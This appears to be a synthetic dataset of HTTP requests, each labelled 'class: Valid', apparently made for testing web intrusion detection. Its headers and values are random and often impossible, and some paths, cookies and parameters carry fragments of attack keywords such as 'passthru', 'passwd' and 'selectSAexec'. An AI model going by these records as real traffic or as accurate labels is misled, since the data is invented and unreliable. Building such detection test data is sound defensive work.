If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Sat, 10 Sep 05 09:40:17 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 8532
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: oehb ranln=fcmedrne
Range: -43159,7-
Referer: http://www.vtOhh.ch/CenEnum0/ottinsoh/5adeYf.shtml
TE: trailers
Trailer: Connection
User-Agent: Mozilla/0.9 (compatible; MSIE 6.0; Windows NT; rqocluls; eevxatr; aleybeuhl)
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3095x7377
Via: FTP/0.3 www.teygjyw.js
Transfer-Encoding: gzip
Upgrade: isn/7.4, skmojq/8.7, srajau/4.8, osil/1.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49777
Start - Id: 28257
class: Valid
GET /nGpVkm/eCbC0b3EUfabUI4-/t9.jsp?ka9d=ha3lunuTeaH%29a%7C&etiPat=c2X6&ewggeetnTu=stseu5p7a7 HTTP/1.1
Host: www.eoen8.ch:92233
Connection: close
Accept: application/postscript;q=0.9
Accept-Charset: iso-8859-2, big5, iso-8859-6;q=0.2, windows-1250;q=0.5, x-mac-hebrew;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=297
Client-ip: 41.93.216.69
Cookie: dtnioz=w=;dsiuhfAe7oti4=oauoyll2ersgh;e9e=s
Cookie2: $Version="316"
Date: Fri, 23 Nov 07 20:42:37 CET
ETag: W/"XFzzI4W4rJFOBKEx"
Expect: ibTp1t=svzsd
From: sse6d@agdeoarrhr.com
If-Modified-Since: Thu, 18 Jun 09 21:54:43 UTC
If-Unmodified-Since: Wed, 30 Aug 06 19:36:20 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Sep 05 23:01:44 CET
Max-Forwards: 533
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest username="4yGrs"
Authorization: enma ahl6utin=TPmo
Range: 29956-,-15205
Referer: /eHite.tiff
TE: trailers,trailers,deflate;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/9.9 (Windows; U; Win98 9.3; th-ll; rv:8.8.2) Gecko/71924627
UA-CPU: PowerPC
UA-Disp: 5435,696,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0895x834
Via: 5.2 www.gnrup.gif, 2.4 www.oB8suldr.gif, 1.1 www.wBl1.htm
Transfer-Encoding: tnaen; rrme=nd7Nnod
Upgrade: Mawni/6.2, Noi/4.8, ldse/8.3, btheC/8.2
Warning: 334 0.64.248.123:76205 "otiprr" "Wed, 15 Aug 07 02:30:33 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28257
Start - Id: 23493
class: Valid
GET /tZ6S8vj47w/i4sSbREucGO-V6HAjM_/selectSAexecI3gY0LvDK/mJ@kTHwP/nQS/KZwHB/Ra/dElillqb2taaseO/rLk.jpg?teqm=9228&pgmegmeAt=a%40A.5&ihtqEeA=%3E2o&5c=A%3A&mRade8ge=23621180&baxpcipbI=1925154&e8d=rpassthru&mesarjunmxroGrg=19951&eyisb7iqaM0sv=70&siestfrelA=59352698&atBlRlfzOtlreea=273597&c5tdth=b&PhXWTkMw9=0494864225&oihrur=%252%24l HTTP/1.0
Host: 16.210.0.57
Connection: mowreoW
Accept: audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: arhIo1el-mtds1hrl;q=0.5, 7cSetreU-4a
Cache-Control: only-if-cached
Client-ip: 190.224.239.165
Cookie: q9tie=ascfrspip;IwtmqI=80;YV9VpassthrupmUshutdownCG=vdrtz;ueyniNaeI=1460;wsq1yEe6W=4u;hemH0cisd9rs=723
Cookie2: $Version="08"
Date: Fri, 07 Mar 08 18:52:54 GMT
ETag: "nzDiXVOYgqMqegC"
Expect: ntwanmr=ehse;cilvgi=Mo4Ptl7o
From: 0i0nss@eecr.it
If-Modified-Since: Wed, 23 Aug 06 21:52:51 GMT
If-Unmodified-Since: Thu, 10 Feb 05 23:38:01 GMT
If-Match: *
If-None-Match: "JeDvWTqEUw-et1row"
If-Range: *
Max-Forwards: 40
MIME-Version: 3.3
Pragma: teo='p'
Proxy-Authorization: NTLM c2l3ZDVuc2VrN2VjYW5ldGx5aXpORXlFaHNvdmV0b2R0ZXNldTNza2Rzb2lkdQ==
Authorization: Digest qop=auth
Range: 58-,728-,-0
Referer: /RSr9rtei/n5etuou/e84Ebi/ihnc.txt
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 8.1; yy-hz; rv:8.3.3) Gecko/05548386
UA-CPU: StrongARM
UA-Disp: 674,494,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7794x3946
Via: 8.1 190.160.48.95, neu/1.7 201.134.36.43:453
Transfer-Encoding: gzip
Upgrade: akoe/8.8, eee/8.5, nl0i/0.3, noNso/2.0
Warning: 811 www.lroqoi.shtml:7678 "achtda" "Thu, 03 May 07 03:52:45 UTC"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 22339968152502117473
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23493
Start - Id: 17221
class: Valid
GET /akJ8NtSNfOWcCLd/5tlennaerd0N/n8kTIcV-twIvF9EkPyG9/oA/uH2/v7Ip-tL@HA-/at/eb_EtE@Cdy.J9vEX./xKTlslfnph-ainasystemM/fuLP0uGVeN7eG/e5xztL-xp0xAT4v8wmn8/4y_eZ.cgi?eisnZaIhn9=6k1.S-m&antylapidne=v-8V-PtQoj2m&rNlartN5j7ib=b8le HTTP/1.0
Host: 233.29.154.190:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: 3S=duae3see
Client-ip: 82.229.86.142
Cookie: positionXJechoa-bodykdocumentbetween=40;ymaeoatl3s=2369244;3eamndEmas9l=144847
Cookie2: $Version="005"
Date: Mon, 25 Jun 07 13:19:20 CET
ETag: "IvDSXhdQgL69PXba7C6"
Expect: 100-continue
From: tytiiae@0oytu.it
If-Modified-Since: Tue, 23 Sep 08 14:54:00 UTC
If-Unmodified-Since: Wed, 20 Feb 08 15:09:40 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Mar 05 21:41:05 UTC
Max-Forwards: 98
MIME-Version: 3.9
Pragma: tnnk=e5roero
Proxy-Authorization: NTLM Z2Jlbmlvb28zZW5hN3M3Z2F3d21ybGVlMUZzMmlmZmlub2VkM2l0b2UwZnB0dw==
Authorization: NTLM bVJjYXM2NGttdG5yMDBldm1PYW1pZHZzZ2FpZFh0QWE5NlQ4bm90N3lzRU8=
Range: 601-
Referer: /domegt.html
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: ggqEhtshhaeinIeia20t
UA-CPU: 68000
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 0.5 111.239.254.204:338, 7.1 www.bmeuEdu.tiff, 7.4 28.91.114.39:07112
Transfer-Encoding: meeH
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 534738047598763
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17221
Start - Id: 26906
class: Valid
GET /ig/m4TQb/r7qgfzYSsV3Rxs.L@0W_/loledVeTgttee4bg/UhLranaea7g/uueRKx@/0Il2cEm/y4E3/nehtsec4eeOs6ema/sesqteddt/oh/ttYzoskyJx.aspx?tro=574273215 HTTP/1.0
Host: www.btkz4nnt.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-sn, n9wh-eanrr;q=0.2
Cache-Control: only-if-cached
Client-ip: 187.70.10.21
Cookie: hs=lltsef;OexMcnm3id=0633324859;sdyeedod=sebia
Cookie2: $Version="23"
Date: Sun, 21 Oct 07 04:48:29 GMT
ETag: "5_JedyMT5Ej0gYQ_"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Fri, 30 Jul 04 09:43:32 CET
If-Unmodified-Since: Fri, 02 Apr 04 06:08:07 GMT
If-Match: "9TdE8O8wX7GkCo2dFZ"
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 6.0
Pragma: efidvei='t'
Proxy-Authorization: NTLM OGVhMHRlbXNpRTVkYkxydWVlaWNoSW43VWFvdTllbkxUZG9lb24=
Authorization: rhns shNupot=hautnN
Range: 0-,7-80207
Referer: http://www.mat3Rgvr.uk/stit1teu/oIoTal5.bin
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: e6jpUjNa http://www.n2cs05.uk
UA-CPU: Sparc
UA-Disp: 0480,6767,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0290x1154
Via: 2.9 www.tToaeo.jpeg:7
Transfer-Encoding: compress
Upgrade: bsetmw/7.7
Warning: 785 139.199.253.164:9 "stduoo4mei" "Wed, 12 Dec 07 02:11:19 CET"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26906
Start - Id: 13403
class: Valid
GET /lHextall/Anph-39mlSDWrpasswdm/utk/5DMN5@LLZkH3/sfFy.@hlDrJ/7vD4cCQ6R_d/oLk/lmLkfnhC4jcU@/aQdart.asp?On0trrco=%7EM6eiutcfkseh&miiavukehutarp=eaOne4eq&ctiehbatceo=y+&abaee4wxate1x=ftpasz%3At-e%3C10d HTTP/1.1
Host: www.bEljcuro.st
Connection: enyw4o
Accept: application/*, application/x-tar, text/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.32.190.111
Cookie: p33ii=6607875042
Cookie2: $Version="835"
Date: Mon, 29 May 06 19:44:17 GMT
ETag: W/"2rEb9PyIEKZaRygZz8G"
Expect: 100-continue
From: eLfi@jwo4ip.biz
If-Modified-Since: Thu, 20 Jan 05 19:31:30 GMT
If-Unmodified-Since: Fri, 29 Jan 10 14:04:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Mar 04 06:37:59 UTC
Max-Forwards: 4
MIME-Version: 7.2
Pragma: oa=rth
Proxy-Authorization: Basic MlNtcmR3bmc6YWx3enQ=
Authorization: Digest cnonce="nlct"
Range: -95
Referer: http://www.it3fs.biz/arampca/8w64/ueHa/4Piaqng/etqaeeii.shtml
TE: gzip;q=0.2,trailers
Trailer: Trailer
User-Agent: ndtIhmTti (iG1CEZH.aM; 749Y9BJkI; ew0P4h0b; mDGXczcUoi; rBPr8wII)
UA-CPU: StrongARM
UA-Disp: 1663,7844,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 191x7499
Via: 1.9 4.206.184.135, 0.1 www.wos9tbr.shtml:02
Transfer-Encoding: identity
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 515 10.196.127.38 "remJrtutyteo" "Sun, 05 Oct 08 13:10:27 GMT"
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 92696306703
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13403
Start - Id: 27727
class: Valid
GET /ssAxmd0moy4btdapi/myOuG4/hootateegb3wyOtoOo/0_ofliF0a_Pk8NGXdGz/iKpy8OhkPMrDRU.php? HTTP/1.1
Host: www.eNea.net
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: compress
Accept-Language: o-h, sp691thc-Sih0a4f;q=0.4, ie1tUrSn-5I, Ii9at-muhn
Cache-Control: uefRe=luvgza
Client-ip: 109.189.121.197
Cookie: 34ZygtleWt7m=8
Cookie2: $Version="8"
Date: Sun, 08 Jan 06 11:26:18 UTC
ETag: "vX38F5@whXCup1f.b"
Expect: 100-continue
From: mFutck@dAkrnce.ch
If-Modified-Since: Fri, 29 Sep 06 20:30:27 UTC
If-Unmodified-Since: Sat, 09 Jul 05 11:24:59 GMT
If-Match: "jcLzerIf-ZgsWSf44@"
If-None-Match: "jLzMqEcI-r3SiN-1Uki0"
If-Range: Sun, 08 May 05 02:15:18 UTC
Max-Forwards: 619
MIME-Version: 5.7
Pragma: 0nm=oeis
Proxy-Authorization: Basic bm9sc1FpYXo6bmhOZUI=
Authorization: NTLM c2RsYW10YWRid3RwcGVvYUhheW5zT2h3emlMbGtkZnN1ZTBh
Range: 6650-
Referer: http://www.iiIe.it/tdcneCre/terhd/iigeiR45/ieeje.swf
TE: deflate
Trailer: Connection
User-Agent: tewnd4
UA-CPU: 68000
UA-Disp: 909,493,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 483x5740
Via: HTTP/2.4 141.153.253.27
Transfer-Encoding: hgasu; ok7ozea=ar8btfr
Upgrade: ugn/2.8
Warning: 358 www.hu7esut.jpeg "amcct9eduta2rliG" 
X-Forwarded-For: 120.223.12.165
X-Serial-Number: 3296146
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27727
Start - Id: 24454
class: Valid
GET /eicE5etatt0dvN/i2eoiennb/hteqFHirtosvmvoq/jZsamQuVxPHdEVN/pHMIBMEekfsH6GF/nEBHog..WJBB/slmleoa4d/K4QbHkp2.cfm?enhjadri4wsie9e=sqnanznnoO&amErviY=3&upea=eeETDTvBD&seiice2b=xs&egdNpnscsE9r9=yKEki2W18j&b9GT-9R=at&eyie2a=48&78A=fniobjectnupdateHzr20Reh&wmnph=073&tsW8riearDeio=nUsh&1J7yqtt5yxX=gm&bfwNLinputrsN6=clrgP HTTP/1.0
Host: 61.181.241.137:1
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-7;q=0.5, macintosh;q=0.7, cp-950, windows-1253;q=0.2
Accept-Encoding: 
Accept-Language: rEaNe-nobco, eomise-yu, hl-c
Cache-Control: t=lihnt
Client-ip: 60.13.48.217
Cookie: PBDbKA=8aaee;RLlVopenpT=eee
Cookie2: $Version="18"
Date: Mon, 22 Dec 08 13:07:01 UTC
ETag: "L7.MGOCMhvEcaCCmm_j"
Expect: 100-continue
From: rC9g@zaeslhesaa.com
If-Modified-Since: Sun, 11 Jan 04 04:45:44 CET
If-Unmodified-Since: Sun, 16 Oct 05 14:28:57 GMT
If-Match: "L2btVXJUgaeZ6-Vws"
If-None-Match: *
If-Range: "EXzia@BCMg-9pI7Qf"
Max-Forwards: 8777
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest username="esafneap"
Authorization: NTLM OXB3clVsdWVleHJFZTJvc2FhZWwzZWMxZHloczM4bGVzNmhweWVrZg==
Range: -1,3-569
Referer: /rlfd/e5lt/Oyvbt8s/namets/rrUUt3v.bin
TE: deflate;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.3 (Windows; U; WinNT 7.8; db-ac; rv:8.7.2) Gecko/51752456
UA-CPU: MIPS
UA-Disp: 200,0703,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: HTTP/9.5 12.131.38.78, 2.6 www.5atmT0p.html, HTTP/0.3 www.nmia.htm
Transfer-Encoding: identity
Upgrade: ahdnfh/7.6, fcyeO/8.8
Warning: 484 www.cn1smnt.png "yoobea7etthhteo" "Mon, 06 Aug 07 16:04:03 GMT"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 782387
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24454
Start - Id: 8656
class: Valid
GET /o3bdsndssoltt9dtbi/tj.msf? HTTP/1.1
Host: www.ntonrlai.it
Connection: ekrb
Accept: image/png;q=0.0, text/html, text/xml
Accept-Charset: iso-8859-6;q=0.9, windows-1251, big5;q=0.2, x-mac-icelandic;q=0.5
Accept-Encoding: 
Accept-Language: i36-u;q=0.2, g-5h
Cache-Control: no-transform
Client-ip: 177.129.186.148
Cookie: Smt=pARFdln;IN0dE3YKtmpvbscriptin.=54;nbuoiiso= b;YaLaSisai=843489584
Cookie2: $Version="118"
Date: Sun, 23 Mar 08 03:17:46 CET
ETag: "vNIe2YSEI3ewdqaY80I"
Expect: yoj8A2=gahra;aiixs=pnlsh
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Fri, 11 Jan 08 11:32:27 UTC
If-Unmodified-Since: Mon, 29 Nov 04 22:36:39 GMT
If-Match: *
If-None-Match: "dIlZ5l701fB8pjD"
If-Range: Sun, 01 Feb 09 03:05:45 GMT
Max-Forwards: 2
MIME-Version: 4.8
Pragma: rbl9=lalt
Proxy-Authorization: Digest nc=ADd2Cfd8
Authorization: Digest username="h5nfabn"
Range: -766,58-986789
Referer: http://9CeAp.biz/iU5shao/efne/ctte.aspx
TE: deflate,deflate;q=0.2
Trailer: Host
User-Agent: jionaiesytmmn
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8393x485
Via: 6.3 www.fmnrM.jpeg, 0.0 www.0mSPlmfl.tiff
Transfer-Encoding: fse6; odieatp=ten9xnc2
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8656
Start - Id: 3911
class: Valid
POST /n3/YyAaKu/s67weopeioten/nl/eh_@.uuyL7ju@/NrroriBi/ezLRcSEdJ/6Dor/bRcOvPwPL1p0TR/rs1Bf_9cyobjectiframeloItmp/44@UT6fhtpass.asmx? HTTP/1.1
Content-Length: 277
Content-Language: cstsiO,tO5tpm23,1
Content-Encoding: gzip
Content-Location: http://Y4cmwe.com/oc7ine/arhnw/hthyute/srienB.nsf
Content-MD5: dUNSclM2YmhFdHNtZmlkQw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Jun 06 14:34:46 CET
Last-Modified: Fri, 04 May 07 13:32:15 CET
Host: 208.38.149.177
Connection: keep-alive
Accept: video/quicktime;q=0.8, image/*
Accept-Charset: iso-8859-4, shift_jis, windows-1257;q=0.5, x-mac-greek;q=0.5, cp-950;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: 7roveoo-hzeih, ehagst2-f
Cache-Control: no-cache
Client-ip: 136.255.71.42
Cookie: ditneAhatattin=I0te;gosne6crrrscnuu=d20
Cookie2: $Version="47"
Date: Wed, 08 Feb 06 13:13:34 CET
ETag: "jwm9SMvzrCks6h5Jg"
Expect: heh9
From: eorts@aetwspnaa.biz
If-Modified-Since: Sun, 19 Jun 05 11:17:12 GMT
If-Unmodified-Since: Mon, 14 Sep 09 20:16:43 UTC
If-Match: "QQQrkZI8IZ7evo6"
If-None-Match: "1peqPWxR0@EuNal8"
If-Range: *
Max-Forwards: 42
MIME-Version: 5.0
Pragma: 71r='edhi'
Proxy-Authorization: z832s 6oeibs=oiszIn
Authorization: eitDal obREhdhs=7rhaeuE
Range: 5-,346-6,-01
Referer: http://www.ehads9n.de/iso5c/xMdi4i/metnuah/beacneeh.gz
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.7 (X11; U; Linux i386 7.7; bD-4c; rv:7.6.4) Gecko/08502662
UA-CPU: 68000
UA-Disp: 341,615,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 698x5679
Via: 1.3 70.111.10.116:8, 2.6 www.heiueeg.png
Transfer-Encoding: gzip
Upgrade: benr/6.9, ceas/6.6, oe8a/3.8, 3meta/5.3
Warning: 884 93.144.26.206:701 "e5urtc8hhy7ie8rxs" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

en93xls=hhLis&uiut7i6n8heeirn=40685&hatft=itu aprmtyTa&h7uNl0bo11il=8&iarinetkL=cdpZyxjer&vtJtErpsls=aCDTzY&goutOtriebrMMe=606930079&ni=n0ap&eoeiresprsh=043367045&lh8ebvrberwsig=iswresianteooorsIE&ransnjo=Smaa&5cZewrot4uneta=Be2aicnreG&tommr=934058811&CSq8opendDJRF=kES&icr=eeo

End - Id: 3911
Start - Id: 5022
class: Valid
POST /2_2hGL/yRn/wnHiewara7nhoceoejkb/seAf/yJSLSallMDG/ls4cKTLV.ICzoyg/dU7EvOD/eWH96wDyqg/eM5yeFfi5.exe? HTTP/1.0
Content-Length: 236
Content-Language: oeascsgn,ettifAii,t0stNim
Content-Encoding: deflate
Content-Location: /ohairsc/nEIonhq/dfim/Oeytq.swf
Content-MD5: cE5saXl0c2xhYTc5c3RydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Apr 04 21:33:51 GMT
Last-Modified: Wed, 06 Feb 08 10:31:32 GMT
Host: 206.253.114.24:80
Connection: keep-alive
Accept: image/png, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: jNok-D8nthj2, s-tsu, eEalef8-tncr6;q=0.4, mre-Sosp
Cache-Control: min-fresh=96540
Client-ip: 162.231.248.117
Cookie: biebp=4HcvwWMZe
Cookie2: $Version="23"
Date: Thu, 05 Nov 09 03:50:16 CET
ETag: "I7MGgHbUxda9tdAq.M@x"
Expect: rjidLy=lcseE5h
From: anypee@kdrqiteI.it
If-Modified-Since: Tue, 17 Jan 06 22:36:04 GMT
If-Unmodified-Since: Fri, 15 Jul 05 08:51:52 GMT
If-Match: "PDBxk8x-Q1fv_hqIiQc"
If-None-Match: *
If-Range: Sat, 07 May 05 03:10:28 UTC
Max-Forwards: 92
MIME-Version: 2.1
Pragma: cYef='spewr'
Proxy-Authorization: NTLM b3lybmFzdHJBcG4wZW50bnNsaGVtZHR3YWZydGllZWxibnJ1dA==
Authorization: Digest realm
Range: -1617,797207-,93795-67
Referer: http://www.ccahetu.uk/zhy9qos.doc
TE: deflate
Trailer: Accept-Encoding
User-Agent: bQ9JbSY6j http://www.koeoj.cz
UA-CPU: StrongARM
UA-Disp: 1514,212,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8269x495
Via: 5.9 www.eoawin.css, HTTP/2.3 184.209.128.254, FTP/2.9 www.ig2Ppai.css
Transfer-Encoding: gzip
Upgrade: zcci/6.6, nahgit/2.1, zBd/1.0
Warning: 847 www.cs4tji.gif:1579 "ciCj6llogyAnxa" "Fri, 13 Oct 06 21:39:00 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 03530
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

o5asnsOigrpOs=a_H6&teiop0hioupcmr=nPzbY8uD9&eihyssorn=npaadspthteAie&clstkmo=3&mail9cTChHCw=5788991&9ayXg=464&2a2=59&lTHtocbTxgqTrn=75394206&7tea8amci=i0o&OMdocument_6i0g8Z=ldi+wao5eoia&kum90sOeed0f33=r1M1W&Z_@U-uOdyE=04083779&qt= div

End - Id: 5022
Start - Id: 29228
class: Valid
GET /hFYQUW@Ku3Pd/3hua8Iyro/dd3Wt9URBok/a0de1.gif?9Ust1rrhyhi=6&ShnetRa3qitsBx=1&zm=8le%28ssrhnXtav&tc5weese73nr9tb=05367935&zttemn=o.LSTg.14N&XzhKqts=eCPOH2&hhctuuzo4thertr=lqI0&r9enNmsr=5 HTTP/1.1
Host: 145.244.73.103:0
Connection: keep-alive
Accept: image/jpeg, audio/x-wav, video/*;q=0.0
Accept-Charset: iso-8859-3
Accept-Encoding: compress;q=0.8, deflate;q=0.5, compress;q=0.2
Accept-Language: *
Cache-Control: max-stale=32008
Client-ip: 24.91.199.11
Cookie: ehtudDtl=select nA;anutPbh=rnpstiiO;td=qPmDs72Ph;ytor=3OAEvYH
Cookie2: $Version="37"
Date: Sun, 02 Mar 08 11:03:04 CET
ETag: W/"2PApzTHpaqIJm8_KQ@@"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Thu, 14 Dec 06 07:24:05 UTC
If-Unmodified-Since: Wed, 21 Apr 04 19:56:33 UTC
If-Match: "UUd.6C-aXcD286CZ3YQ"
If-None-Match: "4wWhqD7GzuK0Hn_of99"
If-Range: *
Max-Forwards: 506
MIME-Version: 8.7
Pragma: dtae8i='mu22n1n'
Proxy-Authorization: Digest qop=deeie
Authorization: Digest cnonce="nsUodO"
Range: -2
Referer: http://eCrea2q.biz/htr4dm/ifieiEn.dll
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.2 (X11; U; Solaris 0.5; q7-mr; rv:7.2.0) Gecko/48734780
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 200x896
Via: FTP/2.1 236.39.8.29, HTTP/6.4 www.eqn5te.jpeg
Transfer-Encoding: gzip
Upgrade: meof/2.8, noaa/9.9, smaese/4.8
Warning: 361 218.11.136.34 "5tnre7tafvhoea" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29228
Start - Id: 1325
class: Valid
GET /fWJo1X/spr/lJQd6ojV83kvfJ_CK/wp-iaaYu/EFjD/mc6a3q/ou3/eE2@784psI8Iu@w/aaed0SeurasLai/iesEAnsi1hc6iseiryhO/aS/NiMda.jpeg?jm=rr%27efrombgsound2lhwprocessing-instructionl&si=49676&no4etTanRmheac=0445435942 HTTP/1.1
Host: www.sT5eee.biz:80
Connection: ah8iag6t
Accept: image/*;q=0.3, audio/*;q=0.3
Accept-Charset: iso-8859-6, x-mac-icelandic;q=0.7, iso-8859-9, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=6364
Client-ip: 16.141.86.214
Cookie: rwEky=437187;trEieeag6fesgOa=sNS;4e=seuze;oi8orv=9ls)ain  wtoyh;Jupdate-0dhtpassb-=je/;htqojehef=acrw1D
Cookie2: $Version="854"
Date: Thu, 05 Aug 04 09:58:48 CET
ETag: "cdzAjY0NJ4jEVrTNe"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Sun, 27 Nov 05 11:14:46 UTC
If-Match: "nm3vm9xdMqFqhSC36KB"
If-None-Match: *
If-Range: *
Max-Forwards: 13
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: e9vjnk aure=ntiF
Authorization: os0tte Hhcl=l6orCcng
Range: -216
Referer: /deeotoex/ntwiHmTA/5wpu/8Myeeiq2/nnlenia.mp3
TE: trailers,trailers
Trailer: Via
User-Agent: oDu9fdtctie
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 290x591
Via: HTTP/1.3 185.248.172.195, 8abobr/3.6 180.5.125.92, 1.2 www.sfeb9l.png:94837
Transfer-Encoding: gzip
Upgrade: t7rs/3.9, wsOC/1.9, elcLbb/7.5, yutxee/3.6, sz6enA/6.2
Warning: 184 240.211.239.198 "etlrhegeXod" 
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 6191285179418731
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1325
Start - Id: 32472
class: Valid
GET /emsw8daa/traoarse8eel/hZHR5zjM5-IsJJ@zb7D-/rVRjY/aE@ecXdRr6/X5OTservices9N0FkzoWOA/o-/ah@Sg6tV6UHmm/25_X5K6vkFDHsy/e6w.i9/hBd/etq.css?qsywp-dTrrNn-j=4776&imhwuteyor8tt=1004&efytat=gwhaving%3Fp%7EeLtieitautoexec%3Cmfa HTTP/1.1
Host: 224.39.140.141:929
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tomT-i;q=0.0, tfmc2-egaheeb, a-EadEri, efkligd-elertx
Cache-Control: min-fresh=4
Client-ip: 93.135.40.113
Cookie: aTdi=rWne;SzXFoN=vf0rg;odefqa0aoit=i2etraRliy;eChecihusJsrah=866708;wgt7FhwlorvMc= b
Cookie2: $Version="9"
Date: Mon, 13 Oct 08 23:41:45 UTC
ETag: W/"Phb_CuN3CBeWzEnJ0F"
Expect: btmuwH=aA9If
From: rltd@seslfu5.st
If-Modified-Since: Wed, 08 Apr 09 04:33:01 UTC
If-Unmodified-Since: Wed, 07 Jan 09 09:50:48 UTC
If-Match: "6jA9svpmhDr06.6GRZyQ"
If-None-Match: *
If-Range: "9qJEo4yhA4SNZKQJ5"
Max-Forwards: 57
MIME-Version: 9.2
Pragma: teriat=re
Proxy-Authorization: vevw8 1cuh=UotoAAs
Authorization: NTLM aHJucnBoYmx6dGFtbklzaG5uZWVZaUNvaWg0b2JjY25ldGVhQQ==
Range: 31-,-9
